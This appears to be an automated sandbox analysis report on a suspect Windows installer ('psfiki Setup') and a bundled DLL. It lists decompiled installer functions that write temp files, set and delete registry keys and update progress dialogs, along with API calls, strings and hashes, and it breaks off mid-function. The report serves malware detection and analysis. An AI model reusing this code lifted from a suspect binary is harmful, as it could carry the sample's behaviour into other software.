                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 86%
                                          			E0040266E(struct _OVERLAPPED* __ebx) {
                                          				void* _t27;
                                          				long _t32;
                                          				struct _OVERLAPPED* _t47;
                                          				void* _t51;
                                          				void* _t53;
                                          				void* _t56;
                                          				void* _t57;
                                          				void* _t58;
                                          
                                          				_t47 = __ebx;
                                          				 *(_t58 - 8) = 0xfffffd66;
                                          				_t52 = E004029E8(0xfffffff0);
                                          				 *(_t58 - 0x44) = _t24;
                                          				if(E0040548B(_t52) == 0) {
                                          					E004029E8(0xffffffed);
                                          				}
                                          				E004055E3(_t52);
                                          				_t27 = E00405602(_t52, 0x40000000, 2);
                                          				 *(_t58 + 8) = _t27;
                                          				if(_t27 != 0xffffffff) {
                                          					_t32 =  *0x42eb74; // 0x31a00
                                          					 *(_t58 - 0x2c) = _t32;
                                          					_t51 = GlobalAlloc(0x40, _t32);
                                          					if(_t51 != _t47) {
                                          						E00403098(_t47);
                                          						E00403066(_t51,  *(_t58 - 0x2c));
                                          						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
                                          						 *(_t58 - 0x30) = _t56;
                                          						if(_t56 != _t47) {
                                          							E00402E44( *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
                                          							while( *_t56 != _t47) {
                                          								_t49 =  *_t56;
                                          								_t57 = _t56 + 8;
                                          								 *(_t58 - 0x38) =  *_t56;
                                          								E004055C3( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
                                          								_t56 = _t57 +  *(_t58 - 0x38);
                                          							}
                                          							GlobalFree( *(_t58 - 0x30));
                                          						}
                                          						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
                                          						GlobalFree(_t51);
                                          						 *(_t58 - 8) = E00402E44(0xffffffff,  *(_t58 + 8), _t47, _t47);
                                          					}
                                          					CloseHandle( *(_t58 + 8));
                                          				}
                                          				_t53 = 0xfffffff3;
                                          				if( *(_t58 - 8) < _t47) {
                                          					_t53 = 0xffffffef;
                                          					DeleteFileA( *(_t58 - 0x44));
                                          					 *((intOrPtr*)(_t58 - 4)) = 1;
                                          				}
                                          				_push(_t53);
                                          				E00401423();
                                          				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t58 - 4));
                                          				return 0;
                                          			}












                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,00031A00,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
                                          • GlobalFree.KERNEL32(?), ref: 00402717
                                          • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66), ref: 00402729
                                          • GlobalFree.KERNEL32(00000000), ref: 00402730
                                          • CloseHandle.KERNEL32(FFFFFD66), ref: 00402748
                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                          • String ID:
                                          • API String ID: 3294113728-0
                                          • Opcode ID: 1fe56166fb6cd4dbd5b8f8a47f0c0769986a224b60575e965902ed59b0249d4b
                                          • Instruction ID: 8136da2242d6e6cba5f284f27b64b1989b358de0d737458f3662c87ad7b72ced
                                          • Opcode Fuzzy Hash: 1fe56166fb6cd4dbd5b8f8a47f0c0769986a224b60575e965902ed59b0249d4b
                                          • Instruction Fuzzy Hash: 4A318B71C00128BBDF216FA9CD49DAE7E79EF05324F10822AF520762E0C7795D419BA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00404CC9(CHAR* _a4, CHAR* _a8) {
                                          				struct HWND__* _v8;
                                          				signed int _v12;
                                          				CHAR* _v32;
                                          				long _v44;
                                          				int _v48;
                                          				void* _v52;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				CHAR* _t26;
                                          				signed int _t27;
                                          				CHAR* _t28;
                                          				long _t29;
                                          				signed int _t39;
                                          
                                          				_t26 =  *0x42e344; // 0x0
                                          				_v8 = _t26;
                                          				if(_t26 != 0) {
                                          					_t27 =  *0x42ec14; // 0x0
                                          					_v12 = _t27;
                                          					_t39 = _t27 & 0x00000001;
                                          					if(_t39 == 0) {
                                          						E0040594D(0, _t39, 0x4297b0, 0x4297b0, _a4);
                                          					}
                                          					_t26 = lstrlenA(0x4297b0);
                                          					_a4 = _t26;
                                          					if(_a8 == 0) {
                                          						L6:
                                          						if((_v12 & 0x00000004) == 0) {
                                          							_t26 = SetWindowTextA( *0x42e328, 0x4297b0);
                                          						}
                                          						if((_v12 & 0x00000002) == 0) {
                                          							_v32 = 0x4297b0;
                                          							_v52 = 1;
                                          							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                          							_v44 = 0;
                                          							_v48 = _t29 - _t39;
                                          							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                          							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                          						}
                                          						if(_t39 != 0) {
                                          							_t28 = _a4;
                                          							 *((char*)(_t28 + 0x4297b0)) = 0;
                                          							return _t28;
                                          						}
                                          					} else {
                                          						_t26 =  &(_a4[lstrlenA(_a8)]);
                                          						if(_t26 < 0x800) {
                                          							_t26 = lstrcatA(0x4297b0, _a8);
                                          							goto L6;
                                          						}
                                          					}
                                          				}
                                          				return _t26;
                                          			}


















                                          APIs
                                          • lstrlenA.KERNEL32(004297B0,00000000,0041FA6B,74EC110C,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                                          • lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041FA6B,74EC110C,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                                          • lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041FA6B,74EC110C), ref: 00404D25
                                          • SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                                          • SendMessageA.USER32 ref: 00404D5D
                                          • SendMessageA.USER32 ref: 00404D77
                                          • SendMessageA.USER32 ref: 00404D85
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                          • String ID:
                                          • API String ID: 2531174081-0
                                          • Opcode ID: 259a6bfffd9455f75c7f37c98e6fd5d39197061d1bb8cf0c94f6c9d48c0e4d13
                                          • Instruction ID: 8ccdf1774425cd87f0729cbca42791fc67af6cd1557da5970d5077929bdf2610
                                          • Opcode Fuzzy Hash: 259a6bfffd9455f75c7f37c98e6fd5d39197061d1bb8cf0c94f6c9d48c0e4d13
                                          • Instruction Fuzzy Hash: 17215EB1900158BBDF119FA5CD80A9EBFB9EF44364F14807AF944A6291C7394E41DF98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00404598(struct HWND__* _a4, intOrPtr _a8) {
                                          				long _v8;
                                          				signed char _v12;
                                          				unsigned int _v16;
                                          				void* _v20;
                                          				intOrPtr _v24;
                                          				long _v56;
                                          				void* _v60;
                                          				long _t15;
                                          				unsigned int _t19;
                                          				signed int _t25;
                                          				struct HWND__* _t28;
                                          
                                          				_t28 = _a4;
                                          				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                          				if(_a8 == 0) {
                                          					L4:
                                          					_v56 = _t15;
                                          					_v60 = 4;
                                          					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                          					return _v24;
                                          				}
                                          				_t19 = GetMessagePos();
                                          				_v16 = _t19 >> 0x10;
                                          				_v20 = _t19;
                                          				ScreenToClient(_t28,  &_v20);
                                          				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                          				if((_v12 & 0x00000066) != 0) {
                                          					_t15 = _v8;
                                          					goto L4;
                                          				}
                                          				return _t25 | 0xffffffff;
                                          			}















                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Message$Send$ClientScreen
                                          • String ID: f
                                          • API String ID: 41195575-1993550816
                                          • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                          • Instruction ID: 6b317f608504f5286e083177801d0cb87e447db18072776417f46e2e8b339eff
                                          • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                          • Instruction Fuzzy Hash: 5C014C71D00219BADB00DBA4DC85BEEBBB8AF59711F10016ABB00B61D0D7B8A9458BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
                                          				char _v68;
                                          				int _t11;
                                          				int _t20;
                                          
                                          				if(_a8 == 0x110) {
                                          					SetTimer(_a4, 1, 0xfa, 0);
                                          					_a8 = 0x113;
                                          				}
                                          				if(_a8 == 0x113) {
                                          					_t20 =  *0x414b78; // 0x7431a
                                          					_t11 =  *0x428b88; // 0x7431e
                                          					if(_t20 >= _t11) {
                                          						_t20 = _t11;
                                          					}
                                          					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                          					SetWindowTextA(_a4,  &_v68);
                                          					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                          				}
                                          				return 0;
                                          			}







                                          APIs
                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B48
                                          • MulDiv.KERNEL32 ref: 00402B73
                                          • wsprintfA.USER32 ref: 00402B83
                                          • SetWindowTextA.USER32(?,?), ref: 00402B93
                                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BA5
                                          Strings
                                          • verifying installer: %d%%, xrefs: 00402B7D
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Text$ItemTimerWindowwsprintf
                                          • String ID: verifying installer: %d%%
                                          • API String ID: 1451636040-82062127
                                          • Opcode ID: 821183565d5cfc23d2a1d69bdf9aca7d49efffeabee144d451769c9d9fec15d5
                                          • Instruction ID: d97cc89adede162bb954025147407c84299f45570db21cfab8362f7584a841fe
                                          • Opcode Fuzzy Hash: 821183565d5cfc23d2a1d69bdf9aca7d49efffeabee144d451769c9d9fec15d5
                                          • Instruction Fuzzy Hash: 25014470A00209BBEB219F60DD09FAE3779AB04305F008039FA06A92D0D7B9A9518B59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrcpynW.KERNEL32(?,?,00000027), ref: 10003436
                                          • RegOpenKeyExW.ADVAPI32 ref: 10003499
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Openlstrcpyn
                                          • String ID: %s\%s\0x%08x$(%p)$LanguageProfile
                                          • API String ID: 77534328-1421907492
                                          • Opcode ID: 9b77289758df9981cdb12700273a463d6cf56a7f0995d51183b9165fc53271a7
                                          • Instruction ID: 56304973e0b4e9db6d9f05f938ea1b2b76457ad332e19d182b71333593b2a668
                                          • Opcode Fuzzy Hash: 9b77289758df9981cdb12700273a463d6cf56a7f0995d51183b9165fc53271a7
                                          • Instruction Fuzzy Hash: D9311AB5D00208EFEB04DF94C845F9DB7B9EF48300F108199E905AB356E734AE94CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          • unsupported interface: %s, xrefs: 1000163F
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID: unsupported interface: %s
                                          • API String ID: 2931989736-1937909893
                                          • Opcode ID: a3265998271b895778a66952157956997085e265a9827a5dfd37aaf3073f306b
                                          • Instruction ID: 6dbbca54aea7cc84ead60828b754bf1db3c43d15c3bab5d3bf0356fa8ccda860
                                          • Opcode Fuzzy Hash: a3265998271b895778a66952157956997085e265a9827a5dfd37aaf3073f306b
                                          • Instruction Fuzzy Hash: F53128B9900209AFEB04DFA4DC45BDE77B1EB88384F108468F9155B345D672EA90CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          • (%p)->(%s %p), xrefs: 10001239
                                          • (%p)->(IID_IEnumTfInputProcessorProfiles %p), xrefs: 10001204
                                          • (%p)->(IID_IUnknown %p), xrefs: 100011C9
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID: (%p)->(%s %p)$(%p)->(IID_IEnumTfInputProcessorProfiles %p)$(%p)->(IID_IUnknown %p)
                                          • API String ID: 2931989736-4158896418
                                          • Opcode ID: 4a77c355e408ac4a6c22c325ebe84522738fa96a0ab4edefaf98694eb5ea0f4e
                                          • Instruction ID: e121058abd95a96cada51250d5e450097ea962742a6669d7697363644343d13c
                                          • Opcode Fuzzy Hash: 4a77c355e408ac4a6c22c325ebe84522738fa96a0ab4edefaf98694eb5ea0f4e
                                          • Instruction Fuzzy Hash: 66211AF9D00209EBEB04DFA4DC41FEE73B4EB98240F108468F9159B345E631EA608B55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040373D(void* __ecx, void* __eflags) {
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed short _t6;
                                          				intOrPtr _t11;
                                          				signed int _t13;
                                          				intOrPtr _t15;
                                          				signed int _t16;
                                          				signed short* _t18;
                                          				signed int _t20;
                                          				signed short* _t23;
                                          				intOrPtr _t25;
                                          				signed int _t26;
                                          				intOrPtr* _t27;
                                          
                                          				_t24 = "1033";
                                          				_t13 = 0xffff;
                                          				_t6 = E004058A2(__ecx, "1033");
                                          				while(1) {
                                          					_t26 =  *0x42eba4; // 0x1
                                          					if(_t26 == 0) {
                                          						goto L7;
                                          					}
                                          					_t15 =  *0x42eb70; // 0x2903c0
                                          					_t16 =  *(_t15 + 0x64);
                                          					_t20 =  ~_t16;
                                          					_t18 = _t16 * _t26 +  *0x42eba0;
                                          					while(1) {
                                          						_t18 = _t18 + _t20;
                                          						_t26 = _t26 - 1;
                                          						if((( *_t18 ^ _t6) & _t13) == 0) {
                                          							break;
                                          						}
                                          						if(_t26 != 0) {
                                          							continue;
                                          						}
                                          						goto L7;
                                          					}
                                          					 *0x42e340 = _t18[1];
                                          					 *0x42ec08 = _t18[3];
                                          					_t23 =  &(_t18[5]);
                                          					if(_t23 != 0) {
                                          						 *0x42e33c = _t23;
                                          						E00405889(_t24,  *_t18 & 0x0000ffff);
                                          						SetWindowTextA( *0x429fb0, E0040594D(_t13, _t24, _t26, "psfiki Setup", 0xfffffffe));
                                          						_t11 =  *0x42eb8c; // 0x1
                                          						_t27 =  *0x42eb88; // 0x29056c
                                          						if(_t11 == 0) {
                                          							L15:
                                          							return _t11;
                                          						}
                                          						_t25 = _t11;
                                          						do {
                                          							_t11 =  *_t27;
                                          							if(_t11 != 0) {
                                          								_t5 = _t27 + 0x18; // 0x290584
                                          								_t11 = E0040594D(_t13, _t25, _t27, _t5, _t11);
                                          							}
                                          							_t27 = _t27 + 0x418;
                                          							_t25 = _t25 - 1;
                                          						} while (_t25 != 0);
                                          						goto L15;
                                          					}
                                          					L7:
                                          					if(_t13 != 0xffff) {
                                          						_t13 = 0;
                                          					} else {
                                          						_t13 = 0x3ff;
                                          					}
                                          				}
                                          			}


















                                          APIs
                                          • SetWindowTextA.USER32(00000000,psfiki Setup), ref: 004037D5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: TextWindow
                                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\$psfiki Setup$M)
                                          • API String ID: 530164218-1714131925
                                          • Opcode ID: 1fdd10153c028f400a2c38a9490845b69d8669821a40b98c4704357bf5f14cce
                                          • Instruction ID: 6f81ae46ae74fa932ba8997680672ace7202a58944f3865a8996007a7eeda288
                                          • Opcode Fuzzy Hash: 1fdd10153c028f400a2c38a9490845b69d8669821a40b98c4704357bf5f14cce
                                          • Instruction Fuzzy Hash: 7511C6F9B005119BC735DF56DC80A737BADEB84316368817BEC02A7391D73DAD029A98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 85%
                                          			E004022F5(void* __eax) {
                                          				void* _t15;
                                          				char* _t18;
                                          				int _t19;
                                          				char _t24;
                                          				int _t27;
                                          				signed int _t30;
                                          				intOrPtr _t35;
                                          				void* _t37;
                                          
                                          				_t15 = E00402ADD(__eax);
                                          				_t35 =  *((intOrPtr*)(_t37 - 0x14));
                                          				 *(_t37 - 0x30) =  *(_t37 - 0x10);
                                          				 *(_t37 - 0x44) = E004029E8(2);
                                          				_t18 = E004029E8(0x11);
                                          				_t30 =  *0x42ec10; // 0x0
                                          				 *(_t37 - 4) = 1;
                                          				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
                                          				if(_t19 == 0) {
                                          					if(_t35 == 1) {
                                          						E004029E8(0x23);
                                          						_t19 = lstrlenA(0x40a378) + 1;
                                          					}
                                          					if(_t35 == 4) {
                                          						_t24 = E004029CB(3);
                                          						 *0x40a378 = _t24;
                                          						_t19 = _t35;
                                          					}
                                          					if(_t35 == 3) {
                                          						_t19 = E00402E44( *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a378, 0xc00);
                                          					}
                                          					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a378, _t19) == 0) {
                                          						 *(_t37 - 4) = _t27;
                                          					}
                                          					_push( *(_t37 + 8));
                                          					RegCloseKey();
                                          				}
                                          				 *0x42ebe8 =  *0x42ebe8 +  *(_t37 - 4);
                                          				return 0;
                                          			}












                                          APIs
                                          • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?), ref: 00402333
                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nssE7A3.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402353
                                          • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nssE7A3.tmp,00000000), ref: 0040238C
                                          • RegCloseKey.ADVAPI32(?), ref: 0040246F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: CloseCreateValuelstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\nssE7A3.tmp
                                          • API String ID: 1356686001-2374367887
                                          • Opcode ID: a5f1fc052dec93739e248a182860329b9e12ab8a7e21bf283b290d0f06727023
                                          • Instruction ID: 68e10371c4729356781e9985955bb9a28b8d5e30648407f5ab20691da4643e4d
                                          • Opcode Fuzzy Hash: a5f1fc052dec93739e248a182860329b9e12ab8a7e21bf283b290d0f06727023
                                          • Instruction Fuzzy Hash: 1B1172B1E00208BFEB10ABA5DE4EEAF767CEB00758F10443AF505B71D0D7B89D419A69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 10001720
                                          • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 10001772
                                          • RegCloseKey.ADVAPI32(?), ref: 10001787
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: CloseCreateFromString
                                          • String ID: %s\%s$(%p) %s
                                          • API String ID: 1280075732-2567790950
                                          • Opcode ID: ce500cfd66b65368fcf2a15793b5911913619d7a83bbbaf70042ad8ddcb55dee
                                          • Instruction ID: 3c8db2802ff1f6ab8b436818d85b303364ea296c6f62b5d311a1c991380d0d11
                                          • Opcode Fuzzy Hash: ce500cfd66b65368fcf2a15793b5911913619d7a83bbbaf70042ad8ddcb55dee
                                          • Instruction Fuzzy Hash: 40115AF59402087BF710DBA4DC46FEE777CEB48740F008559F709AA145E675E684C7A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 100017E3
                                          • RegDeleteTreeW.ADVAPI32(80000002,?), ref: 10001825
                                          • RegDeleteTreeW.ADVAPI32(80000001,?), ref: 10001837
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: DeleteTree$FromString
                                          • String ID: %s\%s$(%p) %s
                                          • API String ID: 1665489665-2567790950
                                          • Opcode ID: f00fbd4f5c3d1691f66a8c0d2c55779630351e28ee0c36c88d6c747852e204d9
                                          • Instruction ID: 0ce1d3881f00ccc814ef357d99d13f4ff9ef5cab1f85d9203a267f938c563a6f
                                          • Opcode Fuzzy Hash: f00fbd4f5c3d1691f66a8c0d2c55779630351e28ee0c36c88d6c747852e204d9
                                          • Instruction Fuzzy Hash: 1C01E1F6800118EFFB10DBA49C45F9A73BCEB58204F00C155B60D96105EA31EB98CBB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegCloseKey.ADVAPI32(?), ref: 10002E9B
                                          • RegCloseKey.ADVAPI32(00000000), ref: 10002EB1
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 10002ED1
                                          • HeapFree.KERNEL32(00000000), ref: 10002ED8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: CloseHeap$FreeProcess
                                          • String ID: destroying %p
                                          • API String ID: 3033025533-3738993722
                                          • Opcode ID: aa96f5e93ebf0edfe4314f2bf4726b7c8a764b001950a5a4a073e003b2b553c4
                                          • Instruction ID: cb27d5eab1f625c8bc2e7fc68b294abe3c1c585d519fb808310b501a8b3f58d2
                                          • Opcode Fuzzy Hash: aa96f5e93ebf0edfe4314f2bf4726b7c8a764b001950a5a4a073e003b2b553c4
                                          • Instruction Fuzzy Hash: AFF079B9200208AFD701DF54C884EA977A9FB8D355F11C148FA098B365C735E981CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 84%
                                          			E00402A28(void* _a4, char* _a8, long _a12) {
                                          				void* _v8;
                                          				char _v272;
                                          				signed char _t16;
                                          				long _t18;
                                          				long _t25;
                                          				intOrPtr* _t27;
                                          				long _t28;
                                          
                                          				_t16 =  *0x42ec10; // 0x0
                                          				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
                                          				if(_t18 == 0) {
                                          					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                          						__eflags = _a12;
                                          						if(_a12 != 0) {
                                          							RegCloseKey(_v8);
                                          							L8:
                                          							__eflags = 1;
                                          							return 1;
                                          						}
                                          						_t25 = E00402A28(_v8,  &_v272, 0);
                                          						__eflags = _t25;
                                          						if(_t25 != 0) {
                                          							break;
                                          						}
